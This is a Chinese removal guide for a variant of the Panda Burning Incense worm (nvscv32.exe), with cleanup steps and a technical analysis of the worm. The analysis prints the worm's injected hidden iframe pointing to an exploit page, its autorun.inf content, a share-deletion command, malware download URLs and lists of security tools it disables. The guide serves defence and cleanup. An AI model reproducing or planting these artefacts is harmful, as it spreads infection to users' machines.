熊猫烧香病毒nvscv32.exe变种手动清除方案

所属分类: 软件教程 / 安全相关 阅读数: 429
收藏 0 赞 0 分享

一、PConline提供的解决方案

  1.拔网线;

  2.重新进入WinXP安全模式,熊猫烧香病毒进程没有加载,可使用“任务管理器”!(提示:开机后按住F8)

  3.删除病毒文件:%SystemRoot%\system32\drivers\nvscv32.exe。

  4.开始菜单=>运行,运行msconfig命令。在“系统配置实用程序”中,取消与nvscv32.exe相关的进程。也可使用超级兔子魔法设置、HijackThis等,删除nvscv32.exe的注册表启动项。

熊猫烧香病毒nvscv32.exe变种手动清除方案

取消熊猫烧香病毒进程的启动

  5.下载并使用江民专杀工具,修复被感染的exe文件。并及时打上Windows补丁。

  6.清除html/asp/php等,所有网页文件中如下代码:(为防止传播代码有三处修改,请将“。”换为“.”)

  <iframe src=http://www。krvkr。com/worm。htm width=”0” height=”0”></iframe>

  批量清除恶意代码的方法:

  •   可使用Dreamweaver的批量替换。

熊猫烧香病毒nvscv32.exe变种手动清除方案

Dreamweaver批理替换的使用方法

  •   可下载使用BatchTextReplacer批量替换。
  •   部署了Symantec AntiVirus的企业,升级到最新病毒库扫描全盘文件,即可清除被添加的恶意代码和清除病毒文件。

  7.用安装杀毒软件,并升级病毒库,扫描整个硬盘,清除其他病毒文件。推荐PConline多次推荐的“免费卡巴斯基”——Active Virus Sheild。(xxxxxxxxxxxxx)(注:步骤7不能与步骤5调换,以免可修复的带毒文件被删除!

  8.删除每个盘根目录下的autorun.inf文件,利用搜索功能,将Desktop_.ini全部删除。

二、互联安全网提供的解决方法(后文的病毒描述、中毒现象和技术分析均来自互联安全网)

  1:关闭网络共享,断开网络。

  2:使用IceSword结束掉nvscv32.exe进程(速度要快,抢在病毒感染IceSword前)

  3:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\
  Explorer\Advanced\Folder\Hidden\SHOWALL CheckedValue的数值改为1

  4:删除注册表启动项

  [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\]

  nvscv32: "C:\WINDOWS\system32\drivers\nvscv32.exe"

  5:删除C:\WINDOWS\system32\drivers\nvscv32.exe

  6:删除每个盘根目录下的autorun.inf文件和setup.exe文件,利用搜索功能,将Desktop_.ini全部删除。

  7:如果电脑上有脚本文件,将病毒代码全部删除。

  8:关闭系统的自动播放功能。

  这样就基本上将病毒清除了。

三、病毒描述

  含有病毒体的文件被运行后,病毒将自身拷贝至系统目录,同时修改注册表将自身设置为开机启动项,并遍历各个驱动器,将自身写入磁盘根目录下,增加一个 Autorun.inf文件,使得用户打开该盘时激活病毒体。随后病毒体开一个线程进行本地文件感染,并对局域网其他电脑进行扫描,同时开另外一个线程连接某网站下载木马程序进行发动恶意攻击。

  文件名称:nvscv32.exe
  病毒名称:目前各杀毒软件无法查杀(已经将病毒样本上报各杀毒厂商)
  中文名称:(尼姆亚,熊猫烧香)
  病毒大小:68,570 字节
  编写语言:Borland Delphi 6.0 - 7.0
  加壳方式:FSG 2.0 -> bart/xt
  发现时间:2007.1.16
  危害等级:高

四、中毒现象

  1:在系统每个分区根目录下存在setup.exe和autorun.inf文件(A和B盘不感染)。

  2:无法手工修改“文件夹选项”将隐藏文件显示出来。

  3:在每个感染后的文件夹中可见Desktop_ini的隐藏文件,内容为感染日期 如:2007-1-16

  4:电脑上的所有脚本文件中加入以下代码:<iframe src=http://www.krvkr.com/worm.htm width=”0” height=”0”></iframe>

  5:中毒后的机器上常见的反病毒软件及防火墙无法正常开启及运行。

  6:不能正常使用任务管理器,SREng.exe等工具。

  7:无故的向外发包,连接局域网中其他机器。

五、技术分析

  1:病毒文件运行后,将自身复制到%SystemRoot%\system32\drivers\nvscv32.exe

  建立注册表自启动项:

  [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\]

  nvscv32: "C:\WINDOWS\system32\drivers\nvscv32.exe"

  2:查找反病毒窗体病毒结束相关进程:

  •   天网防火墙
  •   virusscan
  •   symantec antivirus
  •   system safety monitor
  •   system repair engineer
  •   wrapped gift killer
  •   游戏木马检测大师
  •   超级巡警

  3:结束以下进程

  •   mcshield.exe
  •   vstskmgr.exe
  •   naprdmgr.exe
  •   updaterui.exe
  •   tbmon.exe
  •   scan32.exe
  •   ravmond.exe
  •   ccenter.exe
  •   ravtask.exe
  •   rav.exe
  •   ravmon.exe
  •   ravmond.exe
  •   ravstub.exe
  •   kvxp.kxp
  •   kvmonxp.kxp
  •   kvcenter.kxp
  •   kvsrvxp.exe
  •   kregex.exe
  •   uihost.exe
  •   trojdie.kxp
  •   frogagent.exe
  •   kvxp.kxp
  •   kvmonxp.kxp
  •   kvcenter.kxp
  •   kvsrvxp.exe
  •   kregex.exe
  •   uihost.exe
  •   trojdie.kxp
  •   frogagent.exe
  •   logo1_.exe
  •   logo_1.exe
  •   rundl132.exe
  •   taskmgr.exe
  •   msconfig.exe
  •   regedit.exe
  •   sreng.exe 

  4:禁用下列服务

  •   schedule
  •   sharedaccess
  •   rsccenter
  •   rsravmon
  •   rsccenter
  •   kvwsc
  •   kvsrvxp
  •   kvwsc
  •   kvsrvxp
  •   kavsvc
  •   avp
  •   avp
  •   kavsvc
  •   mcafeeframework
  •   mcshield
  •   mctaskmanager
  •   mcafeeframework
  •   mcshield
  •   mctaskmanager
  •   navapsvc
  •   wscsvc
  •   kpfwsvc
  •   sndsrvc
  •   ccproxy
  •   ccevtmgr
  •   ccsetmgr
  •   spbbcsvc
  •   symantec core lc
  •   npfmntor
  •   mskservice
  •   firesvc

  5:删除下列注册表项:

  •   software\microsoft\windows\currentversion\run\ravtask
  •   software\microsoft\windows\currentversion\run\kvmonxp
  •   software\microsoft\windows\currentversion\run\kav
  •   software\microsoft\windows\currentversion\run\kavpersonal50
  •   software\microsoft\windows\currentversion\run\mcafeeupdaterui
  •   software\microsoft\windows\currentversion\run\network associates error reporting service
  •   software\microsoft\windows\currentversion\run\shstatexe
  •   software\microsoft\windows\currentversion\run\ylive.exe
  •   software\microsoft\windows\currentversion\run\yassistse

  6:感染所有可执行文件,并将图标改成熊猫烧香病毒nvscv32.exe变种手动清除方案(这次不是熊猫烧香那个图标了)

  7:跳过下列目录:

  •   windows
  •   winnt
  •   systemvolumeinformation
  •   recycled
  •   windowsnt
  •   windowsupdate
  •   windowsmediaplayer
  •   outlookexpress
  •   netmeeting
  •   commonfiles
  •   complusapplications
  •   commonfiles
  •   messenger
  •   installshieldinstallationinformation
  •   msn
  •   microsoftfrontpage
  •   moviemaker
  •   msngaminzone

  8:删除*.gho备份文件。

  9:在所有驱动器根目录建立自身文件副本setup.exe,建立autorun.inf文件使病毒自动运行,设置文件属性为隐藏、只读、系统。

  autorun.inf内容:

  [AutoRun]
  OPEN=setup.exe
  shellexecute=setup.exe
  shell\Auto\command=setup.exe

  10:删除共享:cmd.exe /c net share admin$ /del /y

  11:在机器上所有脚本文件中加入<iframe src=http://www.krvkr.com/worm.htm width=”0” height=”0”></iframe>,此代码地址是一个利用MS-06014漏洞攻击的网页木马,一旦用户浏览中此病毒的服务器上的网页,如果系统没有打补丁,就会下载执行此病毒。

  12:扫描局域网机器,一旦发现漏洞,就迅速传播。

  13:在后台访问http://www。whboy。net/update/wormcn。txt,根据下载列表下载其他病毒。

  目前下载列表如下:(以下链接均为危险内容,请勿点击!

  •   http://www.krvkr.com/down/cq.exe
  •   http://www.krvkr.com/down/mh.exe
  •   http://www.krvkr.com/down/my.exe
  •   http://www.krvkr.com/down/wl.exe
  •   http://www.krvkr.com/down/rx.exe
  •   http://www.krvkr.com/down/wow.exe
  •   http://www.krvkr.com/down/zt.exe
  •   http://www.krvkr.com/down/wm.exe
  •   http://www.krvkr.com/down/dj.exe
  •   http://www.krvkr.com/cn/iechajian.exe

  到此病毒行为分析完毕。

更多精彩内容其他人还在看

360安全卫士怎么自定义皮肤?360皮肤文件夹的具体位置

360安全卫士怎么自定义皮肤?360在特定的节日会自动更换皮肤,但是这些皮肤是装在哪个文件夹呢?可以随意替换吗?下面我们来看看自定义360安全卫士节日皮肤的方法,需要的朋友可以参考下
收藏 0 赞 0 分享

怎么预防电脑中毒? flash漏洞被挂马的解决办法

怎么预防电脑中毒? 很多网站出现了FLASH被挂马的情况,一不小心就会中毒,该怎么保证电脑不中毒呢?下面分享两种解决办法,一种是升级FLASH最新版,还有一种如下文介绍,需要的朋友可以参考下
收藏 0 赞 0 分享

如何使用360安全卫士防止蹭网?360安全卫士防止蹭网图文教程

很多朋友自己装了花钱装了宽带有了无线网,最悲催的是有很多人蹭网用,心里很不舒服,今天小编就为大家带来如何使用360安全卫士防止蹭网
收藏 0 赞 0 分享

360安全卫士怎么更改默认软件?

360安全卫士怎么设置默认软件,在扫描电脑安全的时候,不经意把有用的软件当做病毒扫描出来,那么怎么设置默认软件呢。小编就为大家详细介绍一下,一起来看看吧
收藏 0 赞 0 分享

腾讯电脑管家总之自动劫持IE新建选项卡该怎么办?

腾讯电脑管家总之自动劫持IE新建选项卡该怎么办?电脑安装了腾讯电脑管家以后,出现了一个小问题,每次使用ie打开新建选项卡,都会出来一些广告,这些广告竟然都是电脑管家设置的,该怎么却掉这种广告呢?下面我们一起来看看详细的解决办法
收藏 0 赞 0 分享

腾讯电脑管家弹出怎么使用弹出拦截功能拦截广告?

腾讯电脑管家弹出怎么使用弹出拦截功能拦截广告?常常会看到页面弹出广告(常见的有酷狗音乐,搜狗输入法,搜狐新闻等等),是不是想很烦恼。要怎么用电脑管家拦截呢,下面我们一起来看看设置方法
收藏 0 赞 0 分享

360天巡是什么?360安全防御天巡功能介绍

360天巡是什么?针对企业用户360推出了天巡产品,很多人还不知道360天巡是什么有什么用,下面脚本之家小编就为大家介绍一下360安全防御天巡功能,一起来看看吧
收藏 0 赞 0 分享

腾讯qq管签到赚积分换礼物的详细教程

腾讯qq管家怎样签到得积分?签到领取积分可以提升安全达人等级,高级的安全达人可以领取更丰厚的游戏礼包。另外积分还可以兑换礼品,下面我们一起来看看签到的方法
收藏 0 赞 0 分享

为网络安全而生的反黑安全卫士2015

反黑安全卫士2015是一款由安为科技自主研发的具有双引擎查杀功能的安全软件,拥有全面防护黑客入侵、恶意病毒、简单放心、无干扰等功能。能更快更精准地识别有害文件以及木马程序,有需要的朋友们可以过来下载看看
收藏 0 赞 0 分享

adsafe不能拦截广告怎么办?adsafe无法拦截广告解决办法

有用户反映adsafe不能拦截广告了,主要是爱奇艺、优酷等视频广告。今天脚本之家小编就为大家带来adsafe无法拦截广告解决办法
收藏 0 赞 0 分享
查看更多